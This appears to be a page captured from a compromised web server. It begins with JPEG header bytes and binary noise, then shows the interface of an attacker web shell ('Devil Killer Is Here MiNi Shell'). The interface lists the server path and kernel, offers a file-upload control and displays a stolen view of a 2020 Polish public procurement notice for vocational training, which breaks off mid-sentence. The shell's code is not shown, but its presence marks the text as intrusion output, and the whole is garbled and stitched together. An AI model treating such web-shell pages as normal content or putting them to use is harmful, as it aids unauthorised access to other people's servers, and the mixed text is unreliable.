JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20200724/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20200724/566480-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 566480-N-2020 z dnia 2020-07-24 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Białostocka Fundacja Kształcenia Kadr</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Usługi realizacji szkoleń zawodowych dla uczestników projektu „Pracownik na miarę – doradztwo i szkolenia dla osób pracujących po 30 roku życia” WND-RPPD.02.01.00-20-0251/18 – części I-II zamówienia</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Tak</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"> „Pracownik na miarę – doradztwo i szkolenia dla osób pracujących po 30 roku życia” WND-RPPD.02.01.00-20-0251/18</span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Białostocka Fundacja Kształcenia Kadr</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">---00000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Spółdzielcza</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">8</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">15-441</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Białystok</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">podlaskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">(085) 653 77 00</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">jzynel@bfkk.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">(085) 732 95 05</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.bfkk.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej">www.bfkk.pl</span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">podmiot z art. 3 ust. 1 pkt 3 PZP</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bfkk.pl</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bfkk.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">pisemna</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">ul. Spłóldzielcza 8 15-441 Białystok</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Usługi realizacji szkoleń zawodowych dla uczestników projektu „Pracownik na miarę – doradztwo i szkolenia dla osób pracujących po 30 roku życia” WND-RPPD.02.01.00-20-0251/18 – części I-II zamówienia</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">35/KUR/PNM/RPOWP/2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">3.1.	Przedmiotem zamówienia są usługi realizacji szkoleń zawodowych dla uczestników projektu „Pracownik na miarę – doradztwo i szkolenia dla osób pracujących po 30 roku życia” - części I-II zamówienia.3.2.	Zamówienie jest podzielone na dwie części: w ramach projektu Pracownik na miarę – doradztwo i szkolenia dla osób pracujących po 30 roku życia”:I część zamówienia: przedmiotem zamówienia jest usługa realizacji szkoleń dla uczestników w zakresie szkoleń (Sokółka, powiat sokólski):1.1. Kadry i płace,1.2.	Obsługa wózków jezdniowych o napędzie silnikowym w wymiana butli gazowych w wózkach zasilanych gazem,1.3.	Obsługa suwnic,1.4.	Operator przenośnych żurawi przeładunkowych HDS,1.5.	Instalacje elektroenergetyczne oraz urządzenia napędowe i oświetlenia elektrycznego o napięciu do 1 kV – obsługa, konserwacja,1.6.	Pracownik salonu kosmetycznego z obsługą autoklawu,II część zamówienia: przedmiotem zamówienia jest usługa realizacji szkoleń dla uczestników w zakresie szkoleń (Białystok, powiat białostocki):2.1	ECDL BASE,2.2	Prowadzenie sklepu internetowego,2.3	Cukiernik,2.4	Grafik komputerowy. Adobe Photoshop, Corel Draw,2.5	Spawanie metodą MAG-135,2.6	Spawanie metodą TIG-141,2.7	Pracownik administracyjno-biurowy. Obsługa sekretariatu,2.8	Szkoła wizażu,2.9	Kelner barman, barista,2.10	Obsługa wózków jezdniowych o napędzie silnikowym z wymianą butli gazowych w wózkach zasilanych gazem,2.11	Intendent w placówkach oświatowych.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">80530000-8</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2021-03-31</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">I części zamówienia, dotyczące:1)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika to z odrębnych przepisów – Zamawiający nie określa w tym zakresie warunków udziału w postępowaniu;II części zamówienia, dotyczące:1)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej, o ile to wynika to z odrębnych przepisów – Zamawiający nie określa w tym zakresie warunków udziału w postępowaniu;</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">I części zamówienia, dotyczące:2)	sytuacji ekonomicznej lub finansowej – Zamawiający nie określa w tym zakresie warunków udziału w postępowaniu; ;II części zamówienia, dotyczące:2)	sytuacji ekonomicznej lub finansowej – Zamawiający nie określa w tym zakresie warunków udziału w postępowaniu; </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">I części zamówienia, dotyczące:3)	zdolności technicznej lub zawodowej – Zamawiający oceniając zdolność techniczną lub zawodową Wykonawcy w ramach wszystkich części zamówienia, będzie brał pod uwagę:a)	doświadczenie Wykonawcy. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych, również wykonuje usługę lub usługi polegające na przeprowadzeniu co najmniej jednego szkolenia zawodowego dla co najmniej 3 osób dla każdego z 6 zakresów tematycznych wskazanych w części zamówienia.b)	doświadczenie osób skierowanych przez Wykonawcę do realizacji zamówienia. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że na potrzeby realizacji zamówienia dysponuje co najmniej jedną osobą dla każdego z 6 zakresów tematycznych wskazanych w części zamówienia, która przeprowadziła co najmniej 30 godzin szkoleniowych w danym zakresie tematycznym. - II części zamówienia, dotyczące:3)	zdolności technicznej lub zawodowej – Zamawiający oceniając zdolność techniczną lub zawodową Wykonawcy w ramach wszystkich części zamówienia, będzie brał pod uwagę: a)	doświadczenie Wykonawcy. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności przez Wykonawcę jest krótszy – w tym okresie, wykonał należycie, a w przypadku świadczeń okresowych lub ciągłych, również wykonuje usługę lub usługi polegające na przeprowadzeniu co najmniej jednego szkolenia zawodowego dla co najmniej 4 osób dla każdego z 11 zakresów tematycznych wskazanych w części zamówienia.b)	doświadczenie osób skierowanych przez Wykonawcę do realizacji zamówienia. Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca wykaże, że na potrzeby realizacji zamówienia dysponuje co najmniej jedną osobą dla każdego z 11 zakresów tematycznych wskazanych w części zamówienia, która przeprowadziła co najmniej 30 godzin szkoleniowych w danym zakresie tematycznym.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen"></span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">6.3.1.	w zakresie doświadczenia Wykonawcy:1)	wykaz usług wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane,2)	dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez 